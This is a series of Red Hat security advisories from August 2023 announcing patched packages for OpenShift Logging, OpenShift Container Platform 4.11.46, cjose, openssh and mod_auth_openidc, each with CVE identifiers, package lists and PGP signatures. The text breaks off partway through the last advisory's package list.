Red Hat Security Advisory 2023-4341-01 - Red Hat OpenShift bug fix and security update. Red Hat Product Security has rated this update as having a security impact of Low. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Logging Subsystem 5.7.4 - Red Hat OpenShift bug fix and security update  
Advisory ID:       RHSA-2023:4341-01  
Product:           Logging Subsystem for Red Hat OpenShift  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4341  
Issue date:        2023-08-02  
CVE Names:         CVE-2022-25883 CVE-2023-22796   
=====================================================================

1. Summary:

Logging Subsystem 5.7.4 - Red Hat OpenShift

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.7.4 - Red Hat OpenShift

Security Fix(es):

* nodejs-semver: Regular expression denial of service (CVE-2022-25883)

* rubygem-activesupport: Regular Expression Denial of Service  
(CVE-2023-22796)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2164736 - CVE-2023-22796 rubygem-activesupport: Regular Expression Denial of Service  
2216475 - CVE-2022-25883 nodejs-semver: Regular expression denial of service

5. JIRA issues fixed (https://issues.redhat.com/):

LOG-2701 - [Vector] [Cloudwatch] namespaceUUID is not added to logGroupName when forwarding logs to Cloudwatch.  
LOG-3880 - Deprecated `curation` and `forwarder` are displayed in the console when creating clusterlogging via `Form view`.   
LOG-4015 - [Vector][Loki] vector_component_sent_bytes_total metric for Loki sink not exposed by vector.  
LOG-4073 - Invalid link to doc from installed operator in OpenShift Web Console  
LOG-4237 - Regression with Red Hat OpenShift Logging 5.7.2   
LOG-4242 - Vector pods raise `Configuration error` when forwarding to cloudwatch/googlecloudlogging with tlsSecurityProfile configured.  
LOG-4275 - [release-5.7] Vector pods going into a panic state   
LOG-4302 - CLO raises error message "URL not secure: , but output gcp-logging has TLS configuration parameters" if add tls.securityProfile to CLF when forwarding to googlecloudlogging/cloudwatch.  
LOG-4361 - [release-5.7] Setting custom options on the application tenant removes user-alertmanager configuration  
LOG-4368 - [release-5.7] sts cloudwatch issues after upgrading from 5.5  
LOG-4389 - [release-5.7] Query Label Values from Loki return duplicate values.

6. References:

https://access.redhat.com/security/cve/CVE-2022-25883  
https://access.redhat.com/security/cve/CVE-2023-22796  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkymZDAAoJENzjgjWX9erEOvsP/1qyYiieOWJY/r4PPOJ6nYDH  
t+CegcwyG9rGlMn0+UibYtmmuiH4iYRV+iWDcU9h1yeGWt1Xp1BYS1lOTZ2+1rao  
FmiTGZoOLJXeBhy2ZTMm6JG6HCCazUVlLLlQyXU2SZ24l/2fi9OZ4zl/1Dn6tibZ  
YW7EHpuJRv5WqJHOrYZi4AoMj1DZYHsAuZDF/eqT92liwypJD2dsYt8FM19BeiTG  
9hSEV0YSU+BG+41sLs5dP/sUp1SE1vm31/zRCZPxSRaQPnABapTMpvnrPHIUgSa0  
iPTzYcTLiBsLL7wEz7zrvtKvLcZyyY/O59Id/n1qLP4RXUFgmYKe2x63fOxLVbX5  
n4aY9tfmEuyWqji90NTHvtKI+HAHmJoKZRLm6alBDXQuotId/IWrY8/XipIQWEtC  
CZC4eZ/DjtBeacO1coRhUc6uNigxik/nEmZ+F4v3MyooTm82RBbVOcEyQH2H/cZ4  
902EYa2kmLJSj4EndkV0KWlWUHf12nEF3rvpX8CtVlaGvs8a+76eGEQjEH7oZS1D  
rWw6IWxkd9wqnzIqv++qOwW2VTKkgpUDR1AwoJ+kxqewoYZj3W821m2HAskuVqGj  
xjSFyFNZOtQhvMEy6rgZA3seSaoK+RiP7KcrOAfq+Ay8LYZYLkkjwt8DI5B5Au8G  
FFwpxI/YB+KCwc2hUxVH  
=hBt4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4341-01

Red Hat Security Advisory 2023-4310-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.46. Issues addressed include denial of service and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.11.46 security update  
Advisory ID:       RHSA-2023:4310-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4310  
Issue date:        2023-08-02  
CVE Names:         CVE-2021-38561 CVE-2022-4304 CVE-2023-0215   
                   CVE-2023-0286 CVE-2023-2828 CVE-2023-24329   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.11.46 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.11.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.11.46. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:4312

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

Security Fix(es):  
* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
(CVE-2021-38561)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You can download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
can be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:88583eeaddcda4fbfdcf21f4dad86b01ff09bb010357c51f08fb24eb07fdb602

(For s390x architecture)  
The image digest is  
sha256:9626db69fc59699669497c95e67d8d3ae66d2374d9949ca7031bb25fa9ac188c

(For ppc64le architecture)  
The image digest is  
sha256:10b9e45b7bd97eca6f4ae7b0ed3deac843d6c1474152a40206be851363eb56e8

(For aarch64 architecture)  
The image digest is  
sha256:37433b71c073c6cbfc8173ec7ab2d99032c8e6d6fe29de06e062d85e33e34531

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-15506 - [release-4.11] gather podDisruptionBudget only from openshift namespaces  
OCPBUGS-15539 - IngressVIP getting attach to two nodes at once  
OCPBUGS-15876 - 4.11 ovn-k unit tests failing  
OCPBUGS-16037 - TuneD reverts node level profiles on termination  
OCPBUGS-16126 - Redhat-operators are failing regularly due to startup probe timing out which in turn increases CPU/Mem usage on Master nodes  
OCPBUGS-16152 - Placeholder bug for OCP 4.11.0 extras release  
OCPBUGS-5708 - Bootstraps' pivot service races with bootkube

6. References:

https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/cve/CVE-2023-2828  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkyb3nAAoJENzjgjWX9erEjCMQAKfdfW6FdwjH/Fk+eipVjRmg  
U/JxPlmwI4G/6MNDjDZNv8D0NyyTRi3Gc0spRh6CmEJpDUT3HNR3LbY0IaRDMrzq  
bUjVegFYxFbmjlrcIprEPp4RuUDV9G4POrX5gIuq+v1P/qOE6IWL9L3tRnVLxZsT  
DGXFIajpwbVoXf9mgMkv3kEWHDDN1t+Tt2/w2yYMzqPeHppovByZgF2/jczsQZYT  
QpKSSTm1rLuVr9aFX2dObxbiOQ0eKf+58GibhZRn/lFXpD9kMoV5v6iMwY6kyO70  
umyCRD8ZG/OiY3WsXiiYBFPB/LofRwQGqlIPibIKFcVFzLEvMG8BCBbz60owHmuY  
DMEdg4atBFMjf+dSPFWeOL+dewHuH2mysE0ve3N5wE65Z0m28sZJS7/CYmsNEqQw  
NuZyI75Sb6mQMbyR+BZ7HhX6F0cxezFS66QB10OHnNFamAkz/GU+/GhPc/qpJE+z  
KMLrDsxl8KzirGbD7Vkg/bggAZEbyPuwsLlxLY18aPVLj7q7EI3RZYnQegA7weCM  
FXCG/DifAt9Q/HF2xiMd9rWKEFxXu19jKl4M5pePwmD+aCuTcpxnJDGTnilUW/cA  
SEHKW8/UuzWWGROf5D1bHKMkIP6Bl9SuZTPBhBSosenx1j63mCSP8pscpVelQYPd  
AgASZ/NNiQj1zg2kBgug  
=rThL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4310-01

Red Hat Security Advisory 2023-4417-01 - CJose is C library implementing the Javascript Object Signing and Encryption.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: cjose security update  
Advisory ID:       RHSA-2023:4417-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4417  
Issue date:        2023-08-01  
CVE Names:         CVE-2023-37464   
=====================================================================

1. Summary:

An update for cjose is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

CJose is C library implementing the Javascript Object Signing and  
Encryption (JOSE).

Security Fix(es):

* cjose: AES GCM decryption uses the Tag length from the actual  
Authentication Tag provided in the JWE (CVE-2023-37464)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2223295 - CVE-2023-37464 cjose: AES GCM decryption uses the Tag length from the actual Authentication Tag provided in the JWE

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
cjose-0.6.1-13.el9_0.src.rpm

aarch64:  
cjose-0.6.1-13.el9_0.aarch64.rpm  
cjose-debuginfo-0.6.1-13.el9_0.aarch64.rpm  
cjose-debugsource-0.6.1-13.el9_0.aarch64.rpm

ppc64le:  
cjose-0.6.1-13.el9_0.ppc64le.rpm  
cjose-debuginfo-0.6.1-13.el9_0.ppc64le.rpm  
cjose-debugsource-0.6.1-13.el9_0.ppc64le.rpm

s390x:  
cjose-0.6.1-13.el9_0.s390x.rpm  
cjose-debuginfo-0.6.1-13.el9_0.s390x.rpm  
cjose-debugsource-0.6.1-13.el9_0.s390x.rpm

x86_64:  
cjose-0.6.1-13.el9_0.i686.rpm  
cjose-0.6.1-13.el9_0.x86_64.rpm  
cjose-debuginfo-0.6.1-13.el9_0.i686.rpm  
cjose-debuginfo-0.6.1-13.el9_0.x86_64.rpm  
cjose-debugsource-0.6.1-13.el9_0.i686.rpm  
cjose-debugsource-0.6.1-13.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-37464  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkyWl9AAoJENzjgjWX9erEqvcP/R5BKB67az6ZMnARR/AVk0BW  
4OOVs1g1JPCsaqu8oVolYl2cobJt7XzqrxuXLoGwA5rxcJU/kaK3kLXE3Eq05hXW  
kO6C+qL8dHwm266VaRSWZCVoriYQF1kH7P6mJUU99Z0x15Oh0UNG8hTyQh16JAtv  
Rdgpe7DDpy44VwnGD8rtjTsHybYC9YuRJ7qyTpIHp30QoIYNrXVQwkCMeDvOPwD+  
FooRZcv9ItfBJSXJlGiB4MJ872uWGjqCP/SX/uAE88KBYk++SFxg91MDm0mlEMFf  
+52AtQE09f+Hq5Iu3cDGj6IsHrTxzyawGjIaJZGhISk6268u9zUq55kGsYdOIPB0  
0puaDwWIu58Gwyy4YrOhcr+TGv4ShmNufotGgpV2dV8USsz6nrGd9WWZrapwq38J  
IHuCRS5H4edrv/HkyzXytDUQhFTjJGKEf9L0yTK8D99wpFT+voIfFo6yT8pYEw76  
bnkfypUsdLkyLnMiuLCsv6CY9INydP+wmiRoWrKotJ0d/i1HDH8MFZ3il1MGazXF  
sxtszOQwwRKMy+uZxBV5S+dVo2GYhorpq946Nd1gyvG2xhjOQAhrrUUr9++2dOfX  
AJ5fz9wylbQ0E8Wn5u383TtIny+vszCHjPtkd8jyKyAt8HcPdbd7Eik/eOf/f3Tw  
PYoTlkixsRgXhamJTYvG  
=Yz/C  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4417-01

Red Hat Security Advisory 2023-4413-01 - OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: openssh security update  
Advisory ID:       RHSA-2023:4413-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4413  
Issue date:        2023-08-01  
CVE Names:         CVE-2023-38408   
=====================================================================

1. Summary:

An update for openssh is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

OpenSSH is an SSH protocol implementation supported by a number of Linux,  
UNIX, and similar operating systems. It includes the core files necessary  
for both the OpenSSH client and server.

Security Fix(es):

* openssh: Remote code execution in ssh-agent PKCS#11 support  
(CVE-2023-38408)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the OpenSSH server daemon (sshd) will be  
restarted automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2224173 - CVE-2023-38408 openssh: Remote code execution in ssh-agent PKCS#11 support

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

aarch64:  
openssh-askpass-8.0p1-15.el8_6.aarch64.rpm  
openssh-askpass-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
openssh-cavs-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
openssh-clients-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
openssh-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
openssh-debugsource-8.0p1-15.el8_6.aarch64.rpm  
openssh-keycat-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
openssh-ldap-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
openssh-server-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.15.el8_6.aarch64.rpm

ppc64le:  
openssh-askpass-8.0p1-15.el8_6.ppc64le.rpm  
openssh-askpass-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
openssh-cavs-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
openssh-clients-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
openssh-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
openssh-debugsource-8.0p1-15.el8_6.ppc64le.rpm  
openssh-keycat-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
openssh-ldap-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
openssh-server-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.15.el8_6.ppc64le.rpm

s390x:  
openssh-askpass-8.0p1-15.el8_6.s390x.rpm  
openssh-askpass-debuginfo-8.0p1-15.el8_6.s390x.rpm  
openssh-cavs-debuginfo-8.0p1-15.el8_6.s390x.rpm  
openssh-clients-debuginfo-8.0p1-15.el8_6.s390x.rpm  
openssh-debuginfo-8.0p1-15.el8_6.s390x.rpm  
openssh-debugsource-8.0p1-15.el8_6.s390x.rpm  
openssh-keycat-debuginfo-8.0p1-15.el8_6.s390x.rpm  
openssh-ldap-debuginfo-8.0p1-15.el8_6.s390x.rpm  
openssh-server-debuginfo-8.0p1-15.el8_6.s390x.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.15.el8_6.s390x.rpm

x86_64:  
openssh-askpass-8.0p1-15.el8_6.x86_64.rpm  
openssh-askpass-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
openssh-cavs-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
openssh-clients-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
openssh-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
openssh-debugsource-8.0p1-15.el8_6.x86_64.rpm  
openssh-keycat-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
openssh-ldap-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
openssh-server-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.15.el8_6.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
openssh-8.0p1-15.el8_6.src.rpm

aarch64:  
openssh-8.0p1-15.el8_6.aarch64.rpm  
openssh-askpass-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
openssh-cavs-8.0p1-15.el8_6.aarch64.rpm  
openssh-cavs-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
openssh-clients-8.0p1-15.el8_6.aarch64.rpm  
openssh-clients-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
openssh-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
openssh-debugsource-8.0p1-15.el8_6.aarch64.rpm  
openssh-keycat-8.0p1-15.el8_6.aarch64.rpm  
openssh-keycat-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
openssh-ldap-8.0p1-15.el8_6.aarch64.rpm  
openssh-ldap-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
openssh-server-8.0p1-15.el8_6.aarch64.rpm  
openssh-server-debuginfo-8.0p1-15.el8_6.aarch64.rpm  
pam_ssh_agent_auth-0.10.3-7.15.el8_6.aarch64.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.15.el8_6.aarch64.rpm

ppc64le:  
openssh-8.0p1-15.el8_6.ppc64le.rpm  
openssh-askpass-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
openssh-cavs-8.0p1-15.el8_6.ppc64le.rpm  
openssh-cavs-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
openssh-clients-8.0p1-15.el8_6.ppc64le.rpm  
openssh-clients-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
openssh-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
openssh-debugsource-8.0p1-15.el8_6.ppc64le.rpm  
openssh-keycat-8.0p1-15.el8_6.ppc64le.rpm  
openssh-keycat-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
openssh-ldap-8.0p1-15.el8_6.ppc64le.rpm  
openssh-ldap-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
openssh-server-8.0p1-15.el8_6.ppc64le.rpm  
openssh-server-debuginfo-8.0p1-15.el8_6.ppc64le.rpm  
pam_ssh_agent_auth-0.10.3-7.15.el8_6.ppc64le.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.15.el8_6.ppc64le.rpm

s390x:  
openssh-8.0p1-15.el8_6.s390x.rpm  
openssh-askpass-debuginfo-8.0p1-15.el8_6.s390x.rpm  
openssh-cavs-8.0p1-15.el8_6.s390x.rpm  
openssh-cavs-debuginfo-8.0p1-15.el8_6.s390x.rpm  
openssh-clients-8.0p1-15.el8_6.s390x.rpm  
openssh-clients-debuginfo-8.0p1-15.el8_6.s390x.rpm  
openssh-debuginfo-8.0p1-15.el8_6.s390x.rpm  
openssh-debugsource-8.0p1-15.el8_6.s390x.rpm  
openssh-keycat-8.0p1-15.el8_6.s390x.rpm  
openssh-keycat-debuginfo-8.0p1-15.el8_6.s390x.rpm  
openssh-ldap-8.0p1-15.el8_6.s390x.rpm  
openssh-ldap-debuginfo-8.0p1-15.el8_6.s390x.rpm  
openssh-server-8.0p1-15.el8_6.s390x.rpm  
openssh-server-debuginfo-8.0p1-15.el8_6.s390x.rpm  
pam_ssh_agent_auth-0.10.3-7.15.el8_6.s390x.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.15.el8_6.s390x.rpm

x86_64:  
openssh-8.0p1-15.el8_6.x86_64.rpm  
openssh-askpass-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
openssh-cavs-8.0p1-15.el8_6.x86_64.rpm  
openssh-cavs-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
openssh-clients-8.0p1-15.el8_6.x86_64.rpm  
openssh-clients-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
openssh-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
openssh-debugsource-8.0p1-15.el8_6.x86_64.rpm  
openssh-keycat-8.0p1-15.el8_6.x86_64.rpm  
openssh-keycat-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
openssh-ldap-8.0p1-15.el8_6.x86_64.rpm  
openssh-ldap-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
openssh-server-8.0p1-15.el8_6.x86_64.rpm  
openssh-server-debuginfo-8.0p1-15.el8_6.x86_64.rpm  
pam_ssh_agent_auth-0.10.3-7.15.el8_6.x86_64.rpm  
pam_ssh_agent_auth-debuginfo-0.10.3-7.15.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38408  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkyWl1AAoJENzjgjWX9erEcU0P/RQAp6tLg4iMPX8CMCPDI73o  
1bWh+LTdbJedsrzDywniRiuest4L1H0vDzrRc8xtU9pYsIg/ZhqXZH1dYkjS59YI  
Zk4IHFIWEcBr0g8AbknjAXeba/ASbjYz4Ng1FqAsCLSe8rG6viE/0+OXlDURw52O  
5gkxSh8JaOD+RgsjMypo7GAR47TGbPmwc3akvcg3o6kWMdnFR1MN/cQVHLNLuiem  
RBNbxO/KJty/6UNWf+lz+ikhNaCc1HS+6OCUA9l79a92NQqUyU26I4b7NwFdEnfv  
jkfZ/vPwVypvgo+17ajVLwg1S9lnk5sFmCEQYLmoYNclvpctf7gH5hTDUUdpO5Vc  
2p5ZjbSymap084hXB8t7ess1jOZ0D8WYuCW3jyAjWvFgEOsTgN84KVYfimgoVmij  
kS/pWQrYwrkzB4AtoxOc6KC3vSTrTqTat6IyyK01YOQrxedfb0o0G0xw/wmXTqpc  
MFF3OcAgXQ1ZQUSdIJKBwD0/2e+Gqi0ZkQ9ISMxd+76bK+tVkbTALLrULt6pOrtd  
gJ44C4762hHlJ8bjaFgErN8WsiJY0cpjP64rvPbzLZjHypAY6ZFyhDuNXLdFxLff  
F5519WI0HPJ9HBf1+ZtHW7LYAdAGScuAoVUaaVPzd9m1ry6q448k8kIF891zWRYN  
wcgAsTh2fo0DuorLrcpB  
=MjE7  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4413-01

Red Hat Security Advisory 2023-4418-01 - The mod_auth_openidc is an OpenID Connect authentication module for Apache HTTP Server. It enables an Apache HTTP Server to operate as an OpenID Connect Relying Party and/or OAuth 2.0 Resource Server.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: mod_auth_openidc:2.3 security update  
Advisory ID:       RHSA-2023:4418-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4418  
Issue date:        2023-08-01  
CVE Names:         CVE-2023-37464   
=====================================================================

1. Summary:

An update for the mod_auth_openidc:2.3 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The mod_auth_openidc is an OpenID Connect authentication module for Apache  
HTTP Server. It enables an Apache HTTP Server to operate as an OpenID  
Connect Relying Party and/or OAuth 2.0 Resource Server.

Security Fix(es):

* cjose: AES GCM decryption uses the Tag length from the actual  
Authentication Tag provided in the JWE (CVE-2023-37464)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2223295 - CVE-2023-37464 cjose: AES GCM decryption uses the Tag length from the actual Authentication Tag provided in the JWE

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
cjose-0.6.1-3.module+el8.8.0+19464+578f4546.src.rpm  
mod_auth_openidc-2.4.9.4-1.module+el8.7.0+14797+4085fcb6.src.rpm

aarch64:  
cjose-0.6.1-3.module+el8.8.0+19464+578f4546.aarch64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.8.0+19464+578f4546.aarch64.rpm  
cjose-debugsource-0.6.1-3.module+el8.8.0+19464+578f4546.aarch64.rpm  
cjose-devel-0.6.1-3.module+el8.8.0+19464+578f4546.aarch64.rpm  
mod_auth_openidc-2.4.9.4-1.module+el8.7.0+14797+4085fcb6.aarch64.rpm  
mod_auth_openidc-debuginfo-2.4.9.4-1.module+el8.7.0+14797+4085fcb6.aarch64.rpm  
mod_auth_openidc-debugsource-2.4.9.4-1.module+el8.7.0+14797+4085fcb6.aarch64.rpm

ppc64le:  
cjose-0.6.1-3.module+el8.8.0+19464+578f4546.ppc64le.rpm  
cjose-debuginfo-0.6.1-3.module+el8.8.0+19464+578f4546.ppc64le.rpm  
cjose-debugsource-0.6.1-3.module+el8.8.0+19464+578f4546.ppc64le.rpm  
cjose-devel-0.6.1-3.module+el8.8.0+19464+578f4546.ppc64le.rpm  
mod_auth_openidc-2.4.9.4-1.module+el8.7.0+14797+4085fcb6.ppc64le.rpm  
mod_auth_openidc-debuginfo-2.4.9.4-1.module+el8.7.0+14797+4085fcb6.ppc64le.rpm  
mod_auth_openidc-debugsource-2.4.9.4-1.module+el8.7.0+14797+4085fcb6.ppc64le.rpm

s390x:  
